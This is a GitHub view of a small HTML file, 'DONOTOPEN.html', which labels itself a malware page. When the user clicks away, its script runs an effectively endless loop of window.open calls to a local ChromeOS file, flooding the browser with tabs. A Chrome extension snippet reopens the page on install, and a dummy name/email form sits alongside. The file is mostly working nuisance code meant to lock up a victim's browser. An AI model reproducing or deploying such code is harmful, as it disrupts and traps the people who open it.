-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathDONOTOPEN.html
30 lines (28 loc) · 1.06 KB
/
DONOTOPEN.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Detect Click Away</title>
</head>
<body>
<h1>THIS IS A MALWARE PAGE! CLICK A BOOKMARK TO EXIT!!!</h1>
<script>
window.addEventListener('blur', function() {
for (let i = 0; i < 999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999; i++) {
window.open('file:///home/chronos/u-7af1a465965a13e917a6b71238f91917e60485e9/MyFiles/Downloads/DCO.html', '_blank');
}
});
</script>
<form>
<label for="name">Name:</label>
<input type="text" id="name" name="name"><br><br>
<label for="email">Email:</label>
<input type="email" id="email" name="email"><br><br>
<input type="submit" value="Submit">
</form>
<script>chrome.runtime.onInstalled.addListener(function() {
chrome.tabs.create({ url: "file:///downloads/DONOTOPEN.html" });
});</script>
</body>
</html>